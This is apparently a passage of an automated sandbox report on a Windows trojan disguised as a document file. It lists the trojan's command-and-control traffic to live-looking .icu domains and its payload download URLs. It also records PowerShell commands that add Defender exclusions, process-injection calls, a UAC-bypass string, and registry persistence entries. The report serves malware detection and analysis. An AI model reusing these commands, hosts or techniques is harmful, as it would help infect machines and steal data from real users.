66 63 38 31 65 36 32 65 65 35 35 35 33 66 37 37 61 38 61 62 32 32 33 31 63 35 39 64 37 35 38 39 35 62 31 36 61 31 65 31 64 34 34 38 31 37 36 31 65 63 64 34 35 34 39 37 31 37 61 64 34 62 39 61 36 36 65 31 65 31 37 64 61 30 62 30 65 65 30 37 34 30 65 33 61 38 38 65 30 33 34 32 31 30 61 63 62 30 64 31 33 64 30 36 35 62 62 61 39 35 37 65 37 39 66 37 34 61 63 62 35 38 37 63 63 37 33 32 32 66 65 36 62 62 30 36 33 31 34 38 32 61 32 39 61 34 34 36 61 34 36 65 31 33 64 32 61 66 30 61 38 32 64 31 32 39 63 31 66 35 64 31 34 32 62 61 61 64 38 38 64 31 30 34 65 66 66 66 34 39 35 65 39 39 65 62 38 33 65 39 33 61 35 37 31 31 61 34 38 65 38 65 62 38 65 66 36 34 35 66 65 37 34 63 37 36 30 36 65 31 61 34 65 34 36 35 35 37 36 63 31 37 32 36 30 35 63 31 31 35 62 38 34 62 39 66 65 39 34 63 64 35 32 65 33 64 33 31 63 36 34 36 36 64 33 64 63 39 30 38 30 36 33 38 66 66 62 30 33 66 30 33 66 66 63 64 66 33 65 37 35 62 35 65 62 30 62 30 30 30 32 37 64 63 30 39 32 34 39 33 65 63 62 66 65 39 61 65 34 62 62 39 37 37 38 64 35 32 35 30 61 61 66 63 36 30 37 39 35 66 31 31 30 31 30 32 39 Data Ascii: mykwiugs=748478668d45ff978888faa0844bc49e44b8c805d92c&kueoyi=15264062&ocqe=3d64684b5fe4ffee1daab6c3c6f975e72a6219649c45f3a9942c794d22cc56e36fa43ae32c769a2179c537a19cc68b43d1d80dc4833ae3b2199049f91b8f85e5b590411c91bcab9d840c71467f5ef1098390135acb61f71fa692bb67c8bbf3cc72c7e87fad9d65e4596fbc7b8d872cf80cffc81e62ee5553f77a8ab2231c59d75895b16a1e1d4481761ecd4549717ad4b9a66e1e17da0b0ee0740e3a88e034210acb0d13d065bba957e79f74acb587cc7322fe6bb0631482a29a446a46e13d2af0a82d129c1f5d142baad88d104efff495e99eb83e93a5711a48e8eb8ef645fe74c7606e1a4e465576c172605c115b84b9fe94cd52e3d31c6466d3dc9080638ffb03f03ffcdf3e75b5eb0b00027dc092493ecbfe9ae4bb9778d5250aafc60795f1101029
                      Source: global trafficHTTP traffic detected: POST /forum/logout.php?id=7086675 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 633Cache-Control: no-cacheData Raw: 69 77 65 73 67 6f 63 71 3d 38 35 32 38 31 39 33 34 26 6b 61 6b 61 3d 37 33 65 62 32 63 64 65 62 62 63 63 33 36 62 62 30 37 26 6d 65 71 69 61 6d 3d 33 33 31 65 33 65 30 33 37 39 32 35 35 34 31 31 65 31 35 66 66 37 32 30 36 63 66 30 31 37 32 65 39 36 33 39 36 32 37 30 32 35 35 38 36 39 39 34 35 38 33 36 35 31 61 31 30 36 64 31 66 37 61 65 63 38 63 32 61 37 63 34 63 30 38 38 34 35 61 35 37 38 38 33 65 34 31 30 30 32 66 65 61 31 34 35 31 62 36 35 31 62 36 35 31 31 63 35 33 65 66 34 63 61 61 62 33 65 35 33 35 62 34 32 66 31 38 63 37 31 33 65 64 63 36 63 66 62 63 37 64 66 34 65 65 34 64 34 64 34 30 31 64 37 30 35 30 32 31 62 30 61 30 66 31 36 34 66 32 32 62 63 37 35 62 31 37 34 36 64 30 35 35 66 61 63 30 61 38 61 65 61 38 39 63 64 36 36 63 64 36 66 33 32 63 37 38 31 65 65 30 61 34 37 64 36 33 31 65 65 36 35 65 33 64 30 64 39 33 64 31 38 33 30 64 32 61 61 35 34 34 63 61 31 62 64 38 64 64 38 65 63 31 35 34 62 66 36 33 31 63 34 33 32 61 35 34 34 33 30 39 31 35 31 38 35 39 35 64 62 30 30 38 61 38 33 61 64 36 63 63 37 61 61 32 38 31 34 65 64 63 62 32 37 39 36 30 62 61 33 31 36 63 37 63 31 35 36 34 36 39 38 63 63 64 66 63 32 38 37 35 31 35 38 65 64 30 36 66 61 37 39 61 63 37 35 30 66 38 38 32 38 66 32 33 31 66 33 66 35 31 33 64 37 64 33 38 34 35 39 36 35 34 32 65 37 64 65 33 65 61 62 66 61 62 65 66 63 30 38 33 61 35 63 61 39 66 30 35 36 30 33 35 36 63 61 33 61 61 32 32 39 66 30 33 65 31 30 37 32 34 37 34 61 37 61 33 64 61 39 39 37 64 31 63 66 66 62 64 31 35 34 62 39 63 31 38 39 30 35 64 31 37 63 62 36 30 65 64 35 35 39 33 30 34 64 34 38 38 30 32 37 35 63 34 36 31 33 36 37 38 64 34 39 34 61 61 61 38 32 37 65 62 31 63 35 66 31 33 34 62 36 38 32 38 35 61 61 61 63 36 35 31 37 38 64 39 36 62 63 64 35 39 36 61 38 32 34 31 62 38 32 62 36 36 36 36 33 61 35 33 39 30 66 31 37 32 65 32 62 34 32 38 64 30 61 65 39 35 36 35 38 32 30 63 33 64 37 34 64 32 38 63 37 30 38 63 36 63 39 34 66 61 31 Data Ascii: iwesgocq=85281934&kaka=73eb2cdebbcc36bb07&meqiam=331e3e0379255411e15ff7206cf0172e9639627025586994583651a106d1f7aec8c2a7c4c08845a57883e41002fea1451b651b6511c53ef4caab3e535b42f18c713edc6cfbc7df4ee4d4d401d705021b0a0f164f22bc75b1746d055fac0a8aea89cd66cd6f32c781ee0a47d631ee65e3d0d93d1830d2aa544ca1bd8dd8ec154bf631c432a5443091518595db008a83ad6cc7aa2814edcb27960ba316c7c1564698ccdfc2875158ed06fa79ac750f8828f231f3f513d7d384596542e7de3eabfabefc083a5ca9f0560356ca3aa229f03e1072474a7a3da997d1cffbd154b9c18905d17cb60ed559304d4880275c4613678d494aaa827eb1c5f134b68285aaac65178d96bcd596a8241b82b66663a5390f172e2b428d0ae9565820c3d74d28c708c6c94fa1
                      Source: global trafficHTTP traffic detected: GET /wp-includes/rest-api/endpoints/898/getwd.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: zakriasons.coCache-Control: no-cache
                      Source: global trafficHTTP traffic detected: GET /old/GetDataAVK.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: estrelladamm.icuCache-Control: no-cache
                      Source: unknownDNS traffic detected: queries for: rusianlover.icu
                      Source: unknownHTTP traffic detected: POST /forum/logout.php?page=7 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: rusianlover.icuContent-Length: 1081Cache-Control: no-cache
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
                      Source: powershell.exe, 00000025.00000002.358331639.00000248FF464000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: powershell.exe, 00000025.00000002.358882072.00000248FF834000.00000004.00000001.sdmpString found in binary or memory: http://crl.mi
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-G
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
                      Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmpString found in binary or memory: http://estrelladamm.icu/get.php__vbaVarSetVar
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://estrelladamm.icu/old/GetDataAVK.exe
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://estrelladamm.icu/old/GetDataAVK.exe2
                      Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmpString found in binary or memory: http://estrelladamm.icu/old/get.php
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://rusianlover.icu/forum/logout.php
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://rusianlover.icu/forum/logout.php?id=2442663
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://rusianlover.icu/forum/logout.php?id=2442663t
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://rusianlover.icu/forum/logout.php?id=7086675
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: http://rusianlover.icu/forum/logout.php?pid=925
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmpString found in binary or memory: http://www.apple.com/
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000025.00000002.347954854.000002488161F000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmpString found in binary or memory: https://l0ioz.icu/pub/bin.exe
                      Source: powershell.exe, 00000025.00000002.354101817.0000024891478000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: explorer.exe, 00000003.00000002.553970211.0000000004B20000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                      Source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmpString found in binary or memory: https://www.mql5.com/ru/articles/download/69/system_data_sqlite.zip1
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.55.228:443 -> 192.168.2.5:49717 version: TLS 1.2

                      System Summary:

                      barindex
                      Contains functionality to create processes via WMI
                      Source: Documento--SII--33875.exe, 00000002.00000002.236019487.00000000022A0000.00000040.00000001.sdmpBinary or memory string: EP91%s.manifest%s.configCpuFlushInstructionCache_wcslwr_wcsnicmpwcsstrwcsncpymemsetmemcpyNtQueryInformationThreadNtQueryInformationProcessNtCloseObject ErrorNULL PortUsername required, but NULLTime limit is too shortAlloc Errorhiheh1Windows\CurrentVersion\RunWindows NT\CurrentVersion\Image File Execution Options\%sSOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing\PackagesKB%uInstallNamentkrnl/c start "" "%s" /%s "%s" . &CLS . &echo Fixing issues ...&ECHO Issues fixed! . &exit%pRtlQueryElevationFlagsEnableLUA/c start "" "%s" /%s&EXITwbem\WMIC.exeprocess call create "%s %s" SSDPSRVTCPWindows 3.1 Update Service
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: Documento--SII--33875.exe
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_0043D9E7 GetProcAddress,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,GetProcessHeap,RtlAllocateHeap,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,GetCommandLineA,CreateProcessA,GetProcAddress,GetProcAddress,GetModuleFileNameA,_lopen,GetProcessHeap,RtlAllocateHeap,_hread,_hread,ResumeThread,GetCurrentProcess,VirtualAllocEx,GetProcessHeap,HeapAlloc,GetProcAddress,
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_004661F0
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_00467340
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_004661F0
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_00467340
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_0044F314
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exe 02DCE269070BFEC91E4F01A67D774167F8208F17211E8027D8A7FE3DC62A356B
                      Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe EB7CEA525ECEF555356C13B6948C21DDAD4B8A622FF4C027F285C0C096570253
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess token adjusted: Load Driver
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess token adjusted: Security
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: String function: 004294FB appears 45 times
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: String function: 0042919F appears 42 times
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: String function: 004294FB appears 45 times
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: String function: 0042919F appears 45 times
                      Source: iom7q73oi.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: Documento--SII--33875.exe, 00000001.00000000.227179544.00000000004A0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMs5io.exeDVarFileInfo$ vs Documento--SII--33875.exe
                      Source: Documento--SII--33875.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                      Source: iom7q73oi.exe, 00000022.00000002.315466729.0000000000409000.00000004.00020000.sdmpBinary or memory string: f0 @*\AC:\Users\the\Downloads\SP\[lab]Down\Vb-codes\vb6\downLow3\DownLow3.vbp
                      Source: explorer.exe, 00000003.00000002.575685224.0000000006870000.00000004.00000001.sdmp, iom7q73oi.exe, 00000022.00000000.308012528.0000000000401000.00000020.00020000.sdmpBinary or memory string: @*\AC:\Users\the\Downloads\SP\[lab]Down\Vb-codes\vb6\downLow3\DownLow3.vbp
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@26/13@35/4
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exeJump to behavior
                      Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess created: C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Documento--SII--33875.exeVirustotal: Detection: 49%
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeFile read: C:\Users\user\Desktop\Documento--SII--33875.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe /suac
                      Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: unknownProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess created: C:\Users\user\Desktop\Documento--SII--33875.exe 'C:\Users\user\Desktop\Documento--SII--33875.exe'
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exe /suac
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exe C:\Users\user\AppData\Local\Temp\iom7q73oi.exe
                      Source: C:\Windows\SysWOW64\explorer.exeProcess created: unknown unknown
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeProcess created: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe 'C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exe'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\'
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: Documento--SII--33875.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb} source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
                      Source: Binary string: c:\bwa\sqlite-111.1\srcroot\visualstudio\release\SQLite3.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp
                      Source: Binary string: C:\Users\skunk\Desktop\SPCL\PPP\proyecto polinesia francesa\extractor\new\GetDataAVK\2\GetDataAVK\obj\Debug\GetDataAVK.pdb source: explorer.exe, 00000003.00000002.576708972.0000000007470000.00000004.00000001.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeUnpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack .rdaals2:EW;.text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                      Detected unpacking (overwrites its own PE header)
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeUnpacked PE file: 2.2.Documento--SII--33875.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 14.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 21.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeUnpacked PE file: 32.2.9sek3aw7533q9.exe.400000.0.unpack
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_00468B80 InterlockedIncrement,LoadLibraryA,GetProcAddress,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,WriteFile,OutputDebugStringA,InterlockedDecrement,InterlockedDecrement,
                      Source: Documento--SII--33875.exeStatic PE information: section name: .rdaals2
                      Source: 9sek3aw7533q9_1.exe.3.drStatic PE information: section name: .rdaals2
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_004659F0 push eax; ret
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeCode function: 1_2_004659F0 push eax; ret
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_004659F0 push eax; ret
                      Source: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeCode function: 11_2_004659F0 push eax; ret
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\agq5ooig7au.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\iom7q73oi.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9sek3aw7533q9_1.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exePE file moved: C:\ProgramData\Google Updater 2.0\9sek3aw7533q9.exeJump to behavior

                      Boot Survival:

                      barindex
                      Creates an undocumented autostart registry key
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidationJump to behavior
                      Source: C:\Users\user\Desktop\Documento--SII--33875.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\9sek3aw7533q9.exe DisableExceptionChainValidationJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe DebuggerJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0Jump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Google Updater 2.0Jump to behavior
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
                      Source: C:\Program Files (x86)\SgQxqYuHAkJJtcrRMwbpAWaxZKKYXiSjdnsTvmCLXxuZGo\CpSHySoEfzH.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Google Updater 2.0Jump to behavior
